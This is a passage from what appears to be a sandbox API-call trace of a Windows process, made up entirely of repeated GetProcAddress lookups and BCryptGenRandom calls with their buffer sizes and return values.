0x0 [0203.039] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.039] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.039] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.039] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.040] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.040] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.040] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.040] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.040] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.040] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.040] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.041] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.041] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.041] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.041] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.041] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.041] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.042] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.042] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.042] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.042] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.043] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.043] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.043] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0203.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d631b, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x4d631b) returned 0x0 [0203.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.045] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.045] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.045] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0203.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d6339, cbBuffer=0x1c, dwFlags=0x2 | out: pbBuffer=0x4d6339) returned 0x0 [0203.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0203.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d6355, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x4d6355) returned 0x0 [0203.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.311] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.311] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.314] BCryptGenRandom (in: 